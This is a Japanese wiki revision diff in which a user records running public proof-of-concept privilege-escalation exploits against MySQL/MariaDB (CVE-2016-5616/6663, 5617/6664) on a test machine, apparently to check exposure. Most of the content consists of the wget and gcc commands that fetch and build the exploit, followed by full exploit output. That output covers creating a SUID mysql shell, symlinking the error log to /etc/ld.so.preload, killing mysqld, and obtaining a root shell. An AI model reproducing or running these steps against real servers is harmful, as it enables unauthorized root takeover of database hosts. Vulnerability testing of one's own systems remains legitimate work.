1: 2016-11-11 (Fri) 11:23:42 iseki |
2: 2016-11-11 (Fri) 11:48:56 iseki |
- | *** CVE-2016-5616, 5617 [#u7059892] | + | ** CVE-2016-5616, 5617 [#u7059892] |
| + | *** [[MySQL]], [[MariaDB]], [[Percona]] [#t6c6abf6] |
| - 該当マシンにアカウントがあり,データベースのアクセス(書き込み)可能な場合,Root権限を奪取される | | - 該当マシンにアカウントがあり,データベースのアクセス(書き込み)可能な場合,Root権限を奪取される |
- | - MySQL の初期ユーザ等が残っている場合は,特に危険. | + | - MySQL の初期ユーザ等が残っている場合は特に危険. |
| + | |
| + | - [[CVE-2016-5616>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5616]] |
| + | - [[CVE-2016-5617>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5617]] |
| | | |
| - http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html | | - http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html |
| - http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html | | - http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html |
| + | #br |
| | | |
- | - デフォルトの | + | **** デフォルトユーザ [#c3c58224] |
| + | - パスワードなし,ユーザ名なしのデータはインストール時に削除すべき. |
| MariaDB [mysql]> select Host,User,Password from user; | | MariaDB [mysql]> select Host,User,Password from user; |
| +-----------+------+-------------------------------------------+ | | +-----------+------+-------------------------------------------+ |
| +-----------+------+-------------------------------------------+ | | +-----------+------+-------------------------------------------+ |
| | | |
| + | **** mysql ユーザアカウントのダッシュ [#z9d7510f] |
| + | - Exploit code : [[mysql-privesc-race.c>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c]] |
| | | |
- | [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test | + | $ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c |
| + | $ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/local/mysql/include/mysql -L/usr/local/mysql/lib -lmysqlclient |
| | | |
- | MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit | |
- | mysql-privesc-race.c (ver. 1.0) | |
| | | |
- | CVE-2016-6663 / CVE-2016-5616 | + | [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test |
| | | |
- | For testing purposes only. Do no harm. | + | MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit |
| + | mysql-privesc-race.c (ver. 1.0) |
| | | |
- | Discovered/Coded by: | + | CVE-2016-6663 / CVE-2016-5616 |
| | | |
- | Dawid Golunski | + | For testing purposes only. Do no harm. |
- | http://legalhackers.com | + | |
| | | |
| + | Discovered/Coded by: |
| | | |
- | [+] Starting the exploit as: | + | Dawid Golunski |
- | uid=502(iseki) gid=100(users) 所属グループ=100(users) | + | http://legalhackers.com |
| | | |
- | [+] Connecting to the database `test` as @localhost | |
| | | |
- | [+] Creating exploit temp directory /tmp/mysql_privesc_exploit | + | [+] Starting the exploit as: |
| + | uid=502(iseki) gid=100(users) 所属グループ=100(users) |
| | | |
- | [+] Creating mysql tables | + | [+] Connecting to the database `test` as @localhost |
| | | |
- | DROP TABLE IF EXISTS exploit_table | + | [+] Creating exploit temp directory /tmp/mysql_privesc_exploit |
- | DROP TABLE IF EXISTS mysql_suid_shell | + | |
- | CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' | + | |
- | CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' | + | |
| | | |
- | [+] Copying bash into the mysql_suid_shell table. | + | [+] Creating mysql tables |
- | After the exploitation the following file/table will be assigned SUID and executable bits : | + | |
- | -rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD | + | |
| | | |
- | [+] Entering the race loop... Hang in there... | + | DROP TABLE IF EXISTS exploit_table |
- | ->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> | + | DROP TABLE IF EXISTS mysql_suid_shell |
| + | CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' |
| + | CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' |
| | | |
- | [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: | + | [+] Copying bash into the mysql_suid_shell table. |
| + | After the exploitation the following file/table will be assigned SUID and executable bits : |
| + | -rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD |
| | | |
- | -rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD | + | [+] Entering the race loop... Hang in there... |
| + | ->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> |
| | | |
- | [+] Spawning the mysql SUID shell now... | + | [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: |
- | Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) | + | |
- | | + | |
- | mysql_suid_shell.MYD-4.1$ whoami | + | |
- | mysql | + | |
| | | |
| + | -rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD |
| | | |
| + | [+] Spawning the mysql SUID shell now... |
| + | Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) |
| | | |
| + | mysql_suid_shell.MYD-4.1$ whoami |
| + | mysql |
| | | |
- | mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err | + | **** mysql アカウントからの root アカウントのダッシュ [#l4b08281] |
| + | - Exploit code : [[mysql-chowned.sh>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-chowned.sh]] |
| | | |
- | MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit | |
- | mysql-chowned.sh (ver. 1.0) | |
| | | |
- | CVE-2016-6664 / CVE-2016-5617 | + | mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err |
| | | |
- | Discovered and coded by: | + | MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit |
| + | mysql-chowned.sh (ver. 1.0) |
| | | |
- | Dawid Golunski | + | CVE-2016-6664 / CVE-2016-5617 |
- | http://legalhackers.com | + | |
| | | |
- | [+] Starting the exploit as | + | Discovered and coded by: |
- | uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users) | + | |
| | | |
- | [+] Target MySQL log file set to /var/mysql/rigel-b.err | + | Dawid Golunski |
| + | http://legalhackers.com |
| | | |
- | [+] Compiling the privesc shared library (/tmp/privesclib.c) | + | [+] Starting the exploit as |
| + | uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users) |
| | | |
- | [+] Backdoor/low-priv shell installed at: | + | [+] Target MySQL log file set to /var/mysql/rigel-b.err |
- | -rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh | + | |
| | | |
- | [+] Symlink created at: | + | [+] Compiling the privesc shared library (/tmp/privesclib.c) |
- | lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload | + | |
| | | |
- | [+] Waiting for MySQL to re-open the logs/MySQL service restart... | + | [+] Backdoor/low-priv shell installed at: |
| + | -rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh |
| | | |
- | [+] Waiting for MySQL to re-open the logs/MySQL service restart... | + | [+] Symlink created at: |
- | ./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません | + | lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload |
- | Do you want to kill mysqld process to instantly get root? :) ? [y/n] y | + | |
- | Got it. Executing 'killall mysqld' now... | + | |
| | | |
- | [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: | + | [+] Waiting for MySQL to re-open the logs/MySQL service restart... |
- | -rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload | + | |
| | | |
- | [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload | + | [+] Waiting for MySQL to re-open the logs/MySQL service restart... |
| + | ./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません |
| + | Do you want to kill mysqld process to instantly get root? :) ? [y/n] y |
| + | Got it. Executing 'killall mysqld' now... |
| | | |
- | [+] The /etc/ld.so.preload file now contains: | + | [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: |
- | /tmp/privesclib.so | + | -rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload |
| | | |
- | [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! | + | [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload |
- | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh | + | |
| | | |
- | [+] Rootshell got assigned root SUID perms at: | + | [+] The /etc/ld.so.preload file now contains: |
- | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh | + | /tmp/privesclib.so |
| | | |
- | Got root! The database server has been ch-OWNED ! | + | [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! |
| + | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh |
| | | |
- | [+] Spawning the rootshell /tmp/mysqlrootsh now! | + | [+] Rootshell got assigned root SUID perms at: |
| + | -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh |
| | | |
- | mysqlrootsh-4.1# whoami | + | Got root! The database server has been ch-OWNED ! |
- | root | + | |
| | | |
| + | [+] Spawning the rootshell /tmp/mysqlrootsh now! |
| | | |
- | [/code] | + | mysqlrootsh-4.1# whoami |
| + | root |